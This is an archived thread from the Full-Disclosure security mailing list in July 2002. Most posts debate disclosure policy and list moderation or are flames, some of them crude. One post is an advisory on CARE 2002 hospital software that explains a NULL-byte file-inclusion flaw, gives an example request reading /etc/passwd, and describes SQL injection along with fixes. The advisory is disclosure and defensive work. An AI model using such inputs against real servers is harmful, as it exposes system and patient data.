MUAs nowadays can filter on headers other than just Subject. 
I use:

:0:
* ^List-Id:.*full-disclosure.lists.netsys.com
Lists/Full-Disclosure

--Lucky

From Simon.Richter at phobos.fachschaften.tu-muenchen.de Thu Jul 11 21:01:33 2002
From: Simon.Richter at phobos.fachschaften.tu-muenchen.de (Simon Richter)
Date: Thu, 11 Jul 2002 22:01:33 +0200
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To: <20020711135726.GA27619@www1.grok.org.uk>
Message-ID: <00474B8E-9509-11D6-B142-000A278CBB1A@phobos.fs.tum.de>

Hi,

>> To me, the term "full disclosure" does not mean "make it available as
>> fast as possible", but rather "here is the information, expect it to
>> leak in the next two weeks, so go out and fix the bug". The current
>> bugtraq scheme enforces that, and I believe they are doing a great job.

> We are placing the responsibility with the individual, not with an
> organisation here.

IMHO an organisation has a greater chance of doing things right than a
number of individuals. For example, I do not have a complete list of
Linux/BSD/Unix distributors' security contacts, and I believe many others
out there haven't either, however such a list is vital for vendor
notification.

> What we do not believe in is having a situation where a select few are
> aware of a problem, but 99% of the internet populace are powerless to
> defend against it. We are not saying that the vendor should not be
> informed, we are saying, inform the people and the vendor simultaneously.

What do you gain by informing the people? Many people running servers are
unable to disallow mail relaying on their boxes, why do you expect them to
understand how to recompile and reinstall a webserver? Even the few
competent admins who could understand an advisory and fix things by
themselves might like an official update from a distributor, packaged and
ready to install.

>> If we are lucky enough that the vulnerability is spotted by a whitehat,
>> we should not jeopardize the time advantage we have by announcing it
>> publically.
> This situation already occurs. If a researcher leaks information to a > few > 'allies', if a technique is discovered 'in the wild', or if a vendor > silently > fixes unknown problems, then there are those who possess the knowledge > and > those that don't. We are simply providing a forum for those who wish to > try > and balance out this situation. If some bug is being exploited "in the wild" there is no sense in holding back information; I believe the bugtraq moderators understand that (at least they approved postings stating that something was being exploited already within a few minutes. >> In short, I think this is a bad idea because it adds confusion for the >> vulnerability spotters, risks early disclosure before fixes are >> available >> and thus harms the users. > Early disclosure is important, IMO, as was proved with the recent > Apache flaw. > I believe there were reports of Gobbles' exploit being active in the > wild long > before the patched packages were available, Well, I believe this case was a matter of Gobbles' attitude -- they simply didn't follow the rules by sharing their exploit with other people before the official release date. There will always be people like this (=> "instant fame"), and giving them a forum in which they can publicize their exploits to an even wider audience will not make the problem go away. If that happens it is the same thing as with every other exploit being actively used -- notify everyone instantly, as there is no point in still holding back information. I believe the bugtraq moderators understand this, and approve such postings right away. 
Simon From listuser at seifried.org Thu Jul 11 21:15:18 2002 From: listuser at seifried.org (Kurt Seifried) Date: Thu, 11 Jul 2002 14:15:18 -0600 Subject: [Full-Disclosure] Re: Announcing new security mailing list References: <00474B8E-9509-11D6-B142-000A278CBB1A@phobos.fs.tum.de> Message-ID: <01d401c22917$ad2a91b0$1400020a@chaser> Perhaps someone can setup full-disclosure-discuss? I thought this list was for announcements, not the tired/boring/painfully stale "am not" "are so" arguments. Plus the anologies will start coming out and those really suck. And then someone will get compared to Hitler and the thread will be closed, so why not head it off at the pass instead? Kurt Seifried, kurt at seifried.org A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574 http://seifried.org/security/ ----- Original Message ----- From: "Simon Richter" To: "John Cartwright" Cc: ; Sent: Thursday, July 11, 2002 2:01 PM Subject: [Full-Disclosure] Re: Announcing new security mailing list > Hi, > > >> To me, the term "full disclosure" does not mean "make it available as > >> fast > >> as possible", but rather "here is the information, expect it to leak in > >> the next two weeks, so go out and fix the bug". The current bugtraq > >> scheme > >> enforces that, and I believe they are doing a great job. > > > We are placing the responsibility with the individual, not with an > > organisation here. > > IMHO an organisation has a greater chance of doing things right than a > number of individuals. For example, I do not have a complete list of > Linux/BSD/Unix distributors' security contacts, and I believe many > others out there haven't either, however such a list is vital for vendor > notification. > > > What we do not believe in is having a situation where > > a select few are aware of a problem, but 99% of the internet populace > > are > > powerless to defend against it. 
We are not saying that the vendor > > should not > > be informed, we are saying, inform the people and the vendor > > simultaneously. > > What do you gain by informing the people? Many people running servers > are unable to disallow mail relaying on their boxes, why do you expect > them to understand how to recompile and reinstall a webserver? Even the > few competent admins who could understand an advisory and fix things by > themselves might like an official update from a distributor, packaged > and ready to install. > > >> If we are lucky enough > >> that the vulnerability is spotted by a whitehat, we should not > >> jeopardize > >> the time advantage we have by announcing it publically. > > > This situation already occurs. If a researcher leaks information to a > > few > > 'allies', if a technique is discovered 'in the wild', or if a vendor > > silently > > fixes unknown problems, then there are those who possess the knowledge > > and > > those that don't. We are simply providing a forum for those who wish to > > try > > and balance out this situation. > > If some bug is being exploited "in the wild" there is no sense in > holding back information; I believe the bugtraq moderators understand > that (at least they approved postings stating that something was being > exploited already within a few minutes. > > >> In short, I think this is a bad idea because it adds confusion for the > >> vulnerability spotters, risks early disclosure before fixes are > >> available > >> and thus harms the users. > > > Early disclosure is important, IMO, as was proved with the recent > > Apache flaw. > > I believe there were reports of Gobbles' exploit being active in the > > wild long > > before the patched packages were available, > > Well, I believe this case was a matter of Gobbles' attitude -- they > simply didn't follow the rules by sharing their exploit with other > people before the official release date. 
There will always be people > like this (=> "instant fame"), and giving them a forum in which they can > publicize their exploits to an even wider audience will not make the > problem go away. > > If that happens it is the same thing as with every other exploit being > actively used -- notify everyone instantly, as there is no point in > still holding back information. I believe the bugtraq moderators > understand this, and approve such postings right away. > > Simon > > _______________________________________________ > Full-Disclosure mailing list > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > From dufresne at winternet.com Fri Jul 12 00:24:41 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Thu, 11 Jul 2002 18:24:41 -0500 (CDT) Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <01d401c22917$ad2a91b0$1400020a@chaser> Message-ID: Dang! I always liked the Hitler comparisons... ...practically live on analogies... Thanks, Ron DuFresne On Thu, 11 Jul 2002, Kurt Seifried wrote: > Perhaps someone can setup full-disclosure-discuss? I thought this list was > for announcements, not the tired/boring/painfully stale "am not" "are so" > arguments. Plus the anologies will start coming out and those really suck. > And then someone will get compared to Hitler and the thread will be closed, > so why not head it off at the pass instead? 
> > > Kurt Seifried, kurt at seifried.org > A15B BEE5 B391 B9AD B0EF > AEB0 AD63 0B4E AD56 E574 > http://seifried.org/security/ > > > ----- Original Message ----- > From: "Simon Richter" > To: "John Cartwright" > Cc: ; > Sent: Thursday, July 11, 2002 2:01 PM > Subject: [Full-Disclosure] Re: Announcing new security mailing list > > > > Hi, > > > > >> To me, the term "full disclosure" does not mean "make it available as > > >> fast > > >> as possible", but rather "here is the information, expect it to leak in > > >> the next two weeks, so go out and fix the bug". The current bugtraq > > >> scheme > > >> enforces that, and I believe they are doing a great job. > > > > > We are placing the responsibility with the individual, not with an > > > organisation here. > > > > IMHO an organisation has a greater chance of doing things right than a > > number of individuals. For example, I do not have a complete list of > > Linux/BSD/Unix distributors' security contacts, and I believe many > > others out there haven't either, however such a list is vital for vendor > > notification. > > > > > What we do not believe in is having a situation where > > > a select few are aware of a problem, but 99% of the internet populace > > > are > > > powerless to defend against it. We are not saying that the vendor > > > should not > > > be informed, we are saying, inform the people and the vendor > > > simultaneously. > > > > What do you gain by informing the people? Many people running servers > > are unable to disallow mail relaying on their boxes, why do you expect > > them to understand how to recompile and reinstall a webserver? Even the > > few competent admins who could understand an advisory and fix things by > > themselves might like an official update from a distributor, packaged > > and ready to install. 
> > > > >> If we are lucky enough > > >> that the vulnerability is spotted by a whitehat, we should not > > >> jeopardize > > >> the time advantage we have by announcing it publically. > > > > > This situation already occurs. If a researcher leaks information to a > > > few > > > 'allies', if a technique is discovered 'in the wild', or if a vendor > > > silently > > > fixes unknown problems, then there are those who possess the knowledge > > > and > > > those that don't. We are simply providing a forum for those who wish to > > > try > > > and balance out this situation. > > > > If some bug is being exploited "in the wild" there is no sense in > > holding back information; I believe the bugtraq moderators understand > > that (at least they approved postings stating that something was being > > exploited already within a few minutes. > > > > >> In short, I think this is a bad idea because it adds confusion for the > > >> vulnerability spotters, risks early disclosure before fixes are > > >> available > > >> and thus harms the users. > > > > > Early disclosure is important, IMO, as was proved with the recent > > > Apache flaw. > > > I believe there were reports of Gobbles' exploit being active in the > > > wild long > > > before the patched packages were available, > > > > Well, I believe this case was a matter of Gobbles' attitude -- they > > simply didn't follow the rules by sharing their exploit with other > > people before the official release date. There will always be people > > like this (=> "instant fame"), and giving them a forum in which they can > > publicize their exploits to an even wider audience will not make the > > problem go away. > > > > If that happens it is the same thing as with every other exploit being > > actively used -- notify everyone instantly, as there is no point in > > still holding back information. I believe the bugtraq moderators > > understand this, and approve such postings right away. 
> > > > Simon > > > > _______________________________________________ > > Full-Disclosure mailing list > > Full-Disclosure at lists.netsys.com > > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > > _______________________________________________ > Full-Disclosure mailing list > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From BlueBoar at thievco.com Fri Jul 12 02:00:25 2002 From: BlueBoar at thievco.com (Blue Boar) Date: Thu, 11 Jul 2002 18:00:25 -0700 Subject: [Full-Disclosure] Re: Announcing new security mailing list References: <3D2DAC85.4010200@thievco.com> <20020711120054.E1270@techmonkeys.org> Message-ID: <3D2E2A29.2000808@thievco.com> Matthew S. Hallacy wrote: > I disagree, I think my DOCSIS vulnerability posting is a good example of > something that should have gone out immediately, but was /never/ posted. > ( I ended up taking it to another list) > > It was valid, the vendors knew, but it was withheld because you deemed it > 'malicious'. "You", meaning who? Not I.. it went to my list: http://online.securityfocus.com/archive/82/261280 I have my own set of (often harsher) standards for what posts I allow on vuln-dev... but that has nothing to do with Bugtraq. I assume you mean Dave, whose reply is here: http://online.securityfocus.com/archive/82/261454 I suppose you can accuse him of not stating his standards well enough up front for what kinds of messages he considers fraud instructions. I might not have approved the original message either. 
For messages like that, I'm often torn between my policy of not allowing posts that tell that a particular site is vulnerable to a hole only they can fix, and allowing the poster to implicate themself for the poking around they've done. It kinda depends if I feel like I've been made an accessory. If so, I'll usually approve it for the world to see. Or, maybe forward to the FBI. I haven't had occasion to do the latter yet. The point being, that has nothing to do with the Bugtraq moderator holding posts so he can warn a vendor to make a fix. In your case, if I'm reading the headers correctly, there were only about 6 hours between when you sent the note to Bugtraq, and decided it wasn't going to be posted? BB From steve at entrenchtech.com Fri Jul 12 03:37:02 2002 From: steve at entrenchtech.com (Steve) Date: Thu, 11 Jul 2002 20:37:02 -0600 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <3D2E2A29.2000808@thievco.com> Message-ID: <002901c2294d$041a5390$6401a8c0@Laptop2> > I suppose > you can accuse him of not stating his > standards well enough up > front for what kinds of messages he considers fraud instructions. Typically Dave (the Bugtraq moderator) will return the rejected post with comments as to why it was rejected. I can't speak for Dave or Security Focus but in my experience I have seen comments come back as to why a message is being rejected come back from Dave. > I might not have approved the original message either. For > messages like > that, I'm often torn between my policy of not allowing posts > that tell that > a particular site is vulnerable to a hole only they can fix, > and allowing > the poster to implicate themself for the poking around > they've done. It > kinda depends if I feel like I've been made an accessory. If > so, I'll > usually approve it for the world to see. Or, maybe forward > to the FBI. I > haven't had occasion to do the latter yet. 
I think in the case when you have a post that is clearly something illegal - ie: "I just hacked XXX Corp and here is how" then of course you aren't going to post it -- you will probably forward it on to the proper authorities and hope you don't get implicated. But in the case of the DOCSIS post -- it was nothing illegal so why the questions? Of course this is just my observation from outside the whole issue. This reminds me of when I started Win2KSecAdvice - I had some assclown email me saying that he just "0wn3d Microsoft using RFP's RDS exploit" which I obviously thought was a false claim and post but I forwarded it off to the proper people and never let it hit the list. > In your case, if I'm reading the headers correctly, there > were only about 6 > hours between when you sent the note to Bugtraq, and decided > it wasn't > going to be posted? Six hours isn't to out of the question as an expectation but what the poster needs to understand that the larger the mailing list, the longer it is going to take mail to be processed. Also, there is refference in Mathew's post about his post not being accepted or rejected by Bugtraq -- just deleted. Bugtraq runs on the same mailing list software as VulnWatch and there is no way in only six hours that a poster would know that his post was simply ignored. The options to a moderator are, ACCEPT, DENY, or ignore. If you ignore, the message must time out before the poster is notified that it was not acted upon (and in some cases this notification is never sent). I am not saying that I agree with this post not being sent to Bugtraq I am simply trying to give a moderators perspective on how some of the common mailing list apps work. Just my .02$ on a subject that is probably getting beaten to death. 
Regards; Steve Manzuik Founder & Technical Lead Entrench Technologies www.entrenchtech.com Moderator - VulnWatch www.vulnwatch.org -=-=-=-=-=-=-=-=-=-=-=- www.csicon.net -=-=-=-=-=-=-=-=-=-=-=- From SkyLined at edup.tudelft.nl Fri Jul 12 04:21:58 2002 From: SkyLined at edup.tudelft.nl (Berend-Jan Wever) Date: Fri, 12 Jul 2002 05:21:58 +0200 Subject: [Full-Disclosure] Flare References: <002901c2294d$041a5390$6401a8c0@Laptop2> Message-ID: <001001c22953$481a1b10$1b59a182@grotedoos> Can anybody (moderator !?) pleas stop this flare and upen a special full-disclosure-flare at whatever.com mailinglist ? Berend-Jan Wever aka SkyLined http://spoor12.edup.tudelft.nl -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020712/750b26b3/attachment.html From poptix at techmonkeys.org Fri Jul 12 05:34:39 2002 From: poptix at techmonkeys.org (Matthew S. Hallacy) Date: Thu, 11 Jul 2002 23:34:39 -0500 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <3D2E2A29.2000808@thievco.com>; from BlueBoar@thievco.com on Thu, Jul 11, 2002 at 06:00:25PM -0700 References: <3D2DAC85.4010200@thievco.com> <20020711120054.E1270@techmonkeys.org> <3D2E2A29.2000808@thievco.com> Message-ID: <20020711233439.I1270@techmonkeys.org> On Thu, Jul 11, 2002 at 06:00:25PM -0700, Blue Boar wrote: > "You", meaning who? Not I.. it went to my list: > http://online.securityfocus.com/archive/82/261280 > > I have my own set of (often harsher) standards for what posts I allow on > vuln-dev... but that has nothing to do with Bugtraq. > > I assume you mean Dave, whose reply is here: > http://online.securityfocus.com/archive/82/261454 Sorry, it was Dave, I kind of see securityfocus as one large group.. > > I suppose you can accuse him of not stating his standards well enough up > front for what kinds of messages he considers fraud instructions. 
How is it any different from someone writing an exploit and posting it to the list? I didn't even include any scripts for it, I merely explained the process (I did have people, such as 3Com (who still claim there is no problem) say that it was not an issue with their product(s)). > > I might not have approved the original message either. For messages like > that, I'm often torn between my policy of not allowing posts that tell that > a particular site is vulnerable to a hole only they can fix, and allowing > the poster to implicate themself for the poking around they've done. It > kinda depends if I feel like I've been made an accessory. If so, I'll > usually approve it for the world to see. Or, maybe forward to the FBI. I > haven't had occasion to do the latter yet. I didn't view it as illegal, I had been repeatedly informed by AT&T that any speed limitations were due to hardware limitations, and that I should feel free to download all the 'tweaks' available online, etc etc. Never would they admit to having capped the service (I have the emails to/from the AT&T tech support rep stating this) > > The point being, that has nothing to do with the Bugtraq moderator holding > posts so he can warn a vendor to make a fix. It's about censoring valid content based on a single persons feelings. > > In your case, if I'm reading the headers correctly, there were only about 6 > hours between when you sent the note to Bugtraq, and decided it wasn't > going to be posted? Actually I had posted it that Friday, I waited until Monday ~2pm and re-sent it (thus the 'lets try this again' comment), only at that point did I recieve a message back from the moderator that he was not going to allow it through, with no explanation. 6 hours later I posted it to vuln-dev > BB -- Matthew S. 
Hallacy FUBAR, LART, BOFH Certified http://www.poptix.net GPG public key 0x01938203 From vanja at pobox.com Fri Jul 12 09:10:10 2002 From: vanja at pobox.com (Vanja Hrustic) Date: Fri, 12 Jul 2002 15:10:10 +0700 Subject: [Full-Disclosure] Flare In-Reply-To: References: <001001c22953$481a1b10$1b59a182@grotedoos> Message-ID: <20020712151010.59227b71.vanja@pobox.com> On Fri, 12 Jul 2002 02:28:52 -0500 (CDT) Erik Parker wrote: > there is security focus if you want discussions. There is no such thing as "discussion through moderation". Security-focus runs "informative" lists, not "discussion" lists. I don't complain though, since they still provide valuable information. If people don't like what they see on this list, why they choose to complain, instead to unsubscribe?. The whole point of unmoderated list is that everyone has the right to say what they want to say, not what someone else wants to hear. I, for one, like to have a chance to see what anyone has to say. Bashing security-focus, lame advisories, script kiddies. I Don't care. As long as it's not moderated. Bashing will stop, list might or might not die. We'll see. Vanja From lupe at lupe-christoph.de Fri Jul 12 09:52:11 2002 From: lupe at lupe-christoph.de (Lupe Christoph) Date: Fri, 12 Jul 2002 10:52:11 +0200 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: References: Message-ID: <20020712085211.GB24030@lupe-christoph.de> On Thursday, 2002-07-11 at 13:10:29 -0500, Ron DuFresne wrote: > On Thu, 11 Jul 2002, Marc Slemko wrote: > > BTW, spewing "[full-disclosure]" into the subject line is a very annoying > > thing for a list to do. > Actually, it makes it quite easy for procmail recipies and certain mail > readers to filter and categorize the messages. What gets annoying is when > there's a ton of html crap preceeding messages, or those folks spewing > vactions into the lists. 
> Not to mention those danged content filters that
> are set to prevent folks from being offended by words like damn...

My procmail recipe, which does not use the Subject: line:

:0:
* ^List-Id: .*
/home/lupe/Incoming/full-disclosure

I prefer to use List-Id because the list might change the insertion of the
list tag in the Subject: line, but List-Id: is generated by the list
software which normally changes very infrequently.

Lupe Christoph

PS: Since I file each mailing list in a separate file, I find the list name
tag in the Subject: line redundant.

--
| lupe at lupe-christoph.de | http://www.lupe-christoph.de/ |
| I have challenged the entire ISO-9000 quality assurance team to a |
| Bat-Leth contest on the holodeck. They will not concern us again. |
| http://public.logica.com/~stepneys/joke/klingon.htm |

From dufresne at winternet.com Fri Jul 12 13:27:21 2002
From: dufresne at winternet.com (Ron DuFresne)
Date: Fri, 12 Jul 2002 07:27:21 -0500 (CDT)
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To: <002901c2294d$041a5390$6401a8c0@Laptop2>
Message-ID:

On Thu, 11 Jul 2002, Steve wrote:

> > I suppose you can accuse him of not stating his standards well enough
> > up front for what kinds of messages he considers fraud instructions.
>
> Typically Dave (the Bugtraq moderator) will return the rejected post
> with comments as to why it was rejected. I can't speak for Dave or
> Security Focus but in my experience I have seen comments come back as to
> why a message is being rejected come back from Dave.
>

With the new mailman SW the poster gets a standard rejection/denied form
e-mail back. It is then up to the original poster to try and contact the
list admin as to the reason behind the denial of their post. Sometimes,
depending upon the list and list administrator in question, they will get
something with meat in the form of a reason back, sometimes they are
silently ignored.
What has been interesting on this end has been the vapid increase in rejections of postings due to the fact the list maintainer thought the posting in question would generate "too much" discussion and they had not the time to deal with the increased posting flow through their list. We've found this an interesting *rationale*, on the stifeling side as pertains open discussion and the learning process [SNIP] Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From nobody at dizum.com Fri Jul 12 02:50:07 2002 From: nobody at dizum.com (Nomen Nescio) Date: Fri, 12 Jul 2002 03:50:07 +0200 (CEST) Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! Message-ID: <20020712015007.38EC318FBD@mail.zedz.net> X-Originating IP: 66.38.151.9 Message-ID: Big Gay Al's Full Disclosure #001: big gay al feels it important the following is disclosed fully On the $cR!pT k!dDi3$ mailing list - big gay al's evil twin constantly advertise and endorse CORE-SDI product but does not tell that Security Focus seniors are all investors in CORE-SDI. Biased and misleading. Daddy must need new car. Bugtraq moderator will not post your message if you are GOBBLES or not liked. Your post will be added to the for sale database. There is no latency in Bugtraq all posts go out after the bug is entered in to the for sale database and all paying customers are informed. CVE must die and Bugtraq ID must live. All mailing lists not ran by securityfocus must die. If other list exist then bugtraq worthless and not make money. If other list die then bugtraq be the only one and start charging. make money off backs of smart people. hire sheep. 
;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p

death to anti.security.ls
death to project mayhem
Security Focus wants to be to security what Microsoft is to desktop
Does not ISS own this title

foo=man+chu

From avart at gmx.de Fri Jul 12 14:27:55 2002
From: avart at gmx.de (avart at gmx.de)
Date: Fri, 12 Jul 2002 15:27:55 +0200 (MEST)
Subject: [Full-Disclosure] Several problems in CARE 2002
Message-ID: <25962.1026480475@www9.gmx.net>

Several problems in CARE 2002
-------------------------------------

# What is CARE 2002?

CARE 2002 is a free software package for hospitals. It's based on php + mysql. For further information visit .

#### include + NULL problem ####

# Problem description

There are several include statements which use variables passed by the user. So if register_globals is on and magic_quotes_gpc is off you are able to read any file on the webserver:

./main/cafenews.php:
[...]
include("../language/".$lang."/lang_".$lang."_newsdummy.php");
[...]

If $lang contains NULL (aka \0 or %00) the include statement ignores everything after the NULL and includes the file. Here's some metacode explaining the behavior:

foobar.php looks like this:

Calling the file with the following parameter:

foobar.php?input=bla%00bla

results in (with enabled magic_quotes_gpc):
    Warning: Failed opening '../bla\0blablubb' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2

This doesn't seem to be exploitable, but what happens if magic_quotes_gpc is turned off (like in php.ini-recommended, for performance reasons, without pointing to THIS kind of problem)?

    Warning: Failed opening '../bla' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
Huh?! Did you get it? Everything after NULL (%00) is ignored! So what can we do now? We can take a look at the available users:

foobar.php?input=../../../etc/passwd%00

Voila... You can open every file you want. Ok, not every file. It has to be readable by the http-user, like wwwrun or www.

# And the solution?

One can test if a file exists with the function file_exists(). This function doesn't ignore the characters after NULL. On the other side, one could try to avoid using userdata to open a file. In CARE 2002 and other webapps, you are often faced with this kind of problem while handling language or theme files.

# Fix?

The authors will release a new version (1.0.0.2) at . The best way for an admin is to enable magic_quotes_gpc and/or other security related options in php. For further information take a look at: . Other options, like enable_safe_mode or open_base_dir, help you too to keep your server private if you can't trust the executed phpcode.

#### missing addslashes() ####

# Problem description

None of the data passed (there are just a few exceptions) to the mysqld is checked for control characters like ', " et al. So one is able to commit injected sql queries. The problem exists when magic_quotes_gpc is turned off. For further information about dangerous sql queries see: *. *

# And the solution?

One can use addslashes() for _every_ piece of data a user enters that is submitted to the database. Lazy people hope that magic_quotes_gpc is enabled. Never expect that an admin configured a webserver correctly; try to start the security at application level.

# Fix?

Within the new release, the author fixed the problems. Turn magic_quotes_gpc on!

##### Credits #####

Thanks skyp, for cross reading the text.

For the German-speaking folk: Sorry for the broken lines, I hate webmailers :).

-- 
GMX - The communication platform on the Internet.
http://www.gmx.net

From johnc at grok.org.uk Fri Jul 12 14:48:33 2002
From: johnc at grok.org.uk (John Cartwright)
Date: Fri, 12 Jul 2002 14:48:33 +0100
Subject: [Full-Disclosure] List Charter
Message-ID: <20020712134833.GA547@www1.grok.org.uk>

Hi

Now that we've established why we're here, and decided that since we *are* here, we don't need to defend our position, it's time to get down to business.

We're contemplating the creation of a list charter, and welcome your ideas. Whether this occurs on- or off-list is entirely up to you, the members. If we can clean up these issues promptly then we can quickly move toward a more relevant discussion in the future.

Thanks - John

From dotslash at snosoft.com Fri Jul 12 02:55:26 2002
From: dotslash at snosoft.com (KF)
Date: Thu, 11 Jul 2002 21:55:26 -0400
Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!!
References: <20020712015007.38EC318FBD@mail.zedz.net>
Message-ID: <3D2E370E.3010809@snosoft.com>

Ok guys... can we take the bugtraq / vuln-dev / other mailing list flaming crap elsewhere... I have been on this list for a day or so since the initial advertisement and it's already become extremely annoying and worthless.... I do not need my inbox flooded with ALERT ALERT ALERT for some kind of worthless statements dissing on bugtraq.... I signed up for this in hopes of having another useful source of info.

Instead I see myself unsubscribing from this list very soon and probably never posting here if things don't change. Nearly 100% of the mail from this list is talk... go find some holes people.... post some exploits ... but for Christ's sake take the BS offline or in private emails.
-KF

Nomen Nescio wrote:

> X-Originating IP: 66.38.151.9
> Message-ID:
>
> Big Gay Al's Full Disclosure #001:
>
> big gay al feels it important the following is disclosed fully
>
> On the $cR!pT k!dDi3$ mailing list - big gay al's evil twin constantly advertise and endorse CORE-SDI product but does not tell that Security Focus seniors are all investors in CORE-SDI. Biased and misleading. Daddy must need new car.
>
> Bugtraq moderator will not post your message if you are GOBBLES or not liked. Your post will be added to the for sale database. There is no latency in Bugtraq all posts go out after the bug is entered in to the for sale database and all paying customers are informed.
>
> CVE must die and Bugtraq ID must live. All mailing lists not ran by securityfocus must die. If other list exist then bugtraq worthless and not make money. If other list die then bugtraq be the only one and start charging. make money off backs of smart people. hire sheep.
>
> ;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p
>
> death to anti.security.ls
> death to project mayhem
> Security Focus wants to be to security what Microsoft is to desktop
> Does not ISS own this title
>
> foo=man+chu
>
> _______________________________________________
> Full-Disclosure mailing list
> Full-Disclosure at lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure

From simon at snosoft.com Fri Jul 12 15:05:22 2002
From: simon at snosoft.com (ATD)
Date: 12 Jul 2002 10:05:22 -0400
Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!!
In-Reply-To: <3D2E370E.3010809@snosoft.com>
References: <20020712015007.38EC318FBD@mail.zedz.net> <3D2E370E.3010809@snosoft.com>
Message-ID: <1026482723.1674.12.camel@localhost.localdomain>

You beat me to it man.

On Thu, 2002-07-11 at 21:55, KF wrote:
> Ok guys... can we take the bugtraq / vuln-dev / other mailing list
> flaming crap elsewhere...
> I have been on this list for a day or so since
> the initial advertisement and it's already become extremely annoying and
> worthless.... I do not need my inbox flooded with ALERT ALERT ALERT for
> some kind of worthless statements dissing on bugtraq.... I signed up for
> this in hopes of having another useful source of info.
>
> Instead I see myself unsubscribing from this list very soon and
> probably never posting here if things don't change. Nearly 100% of the
> mail from this list is talk... go find some holes people.... post some
> exploits ... but for Christ's sake take the BS offline or in private
> emails.
> -KF
>
> Nomen Nescio wrote:
>
> > X-Originating IP: 66.38.151.9
> > Message-ID:
> >
> > Big Gay Al's Full Disclosure #001:
> >
> > big gay al feels it important the following is disclosed fully
> >
> > On the $cR!pT k!dDi3$ mailing list - big gay al's evil twin constantly advertise and endorse CORE-SDI product but does not tell that Security Focus seniors are all investors in CORE-SDI. Biased and misleading. Daddy must need new car.
> >
> > Bugtraq moderator will not post your message if you are GOBBLES or not liked. Your post will be added to the for sale database. There is no latency in Bugtraq all posts go out after the bug is entered in to the for sale database and all paying customers are informed.
> >
> > CVE must die and Bugtraq ID must live. All mailing lists not ran by securityfocus must die. If other list exist then bugtraq worthless and not make money. If other list die then bugtraq be the only one and start charging. make money off backs of smart people. hire sheep.
> >
> > ;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p;p
> >
> > death to anti.security.ls
> > death to project mayhem
> > Security Focus wants to be to security what Microsoft is to desktop
> > Does not ISS own this title
> >
> > foo=man+chu
>

--
That file you've been guarding, isn't.
-------------------------------------------------------------------
[ASCII-art banner] Secure Network Operations | http://www.snosoft.com | recon at snosoft.com | Project Cerebrum

From dotslash at snosoft.com Fri Jul 12 03:11:14 2002
From: dotslash at snosoft.com (KF)
Date: Thu, 11 Jul 2002 22:11:14 -0400
Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!!
References: <20020712015007.38EC318FBD@mail.zedz.net> <3D2E370E.3010809@snosoft.com> <1026482723.1674.12.camel@localhost.localdomain>
Message-ID: <3D2E3AC2.5080802@snosoft.com>

I have sand in my vagina! man they remind me of whining bitches at the beach...
how's SCO?
-KF

From ARouse at n2bb.com Fri Jul 12 15:17:39 2002
From: ARouse at n2bb.com (Alan Rouse)
Date: Fri, 12 Jul 2002 10:17:39 -0400
Subject: [Full-Disclosure] List Charter
Message-ID: <382BC0C28F397F4785E7414B8279F5271B530E@n2-atl-exch.it.n2bb.com>

My interest is in the earliest possible warning of what the bad guys are currently trying to do to systems like mine. I don't care who it comes from, or whether it is presented in a businesslike manner, as long as it contains useful information. I'm interested in proof of concept code, actual exploit code, artifacts from actual attacks, theoretical vulnerabilities discovered by code reviews, defensive tactics, links to ongoing discussions, educational q & a, or anything else that might make me aware of potential mayhem and how to prepare for it.

I'm not interested in flame wars or philosophical arguments. They don't help me do my job.

From dotslash at snosoft.com Fri Jul 12 03:20:09 2002
From: dotslash at snosoft.com (KF)
Date: Thu, 11 Jul 2002 22:20:09 -0400
Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!!
References: <20020712015007.38EC318FBD@mail.zedz.net> <3D2E370E.3010809@snosoft.com> <1026482723.1674.12.camel@localhost.localdomain> <3D2E3AC2.5080802@snosoft.com>
Message-ID: <3D2E3CD9.8090808@snosoft.com>

Hahah my bad people ... this was not supposed to go to the list ... but yes I was referring to all of you that are whining entirely too much about bugtraq / vuln-dev / etc... you sound like women at the beach... Hope I didn't offend any ladies out there. =]

Someone post a bug or something so we can get off this topic.

KF wrote:
> I have sand in my vagina! man they remind me of whining bitches at the
> beach...
> how's SCO?
> -KF
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure at lists.netsys.com
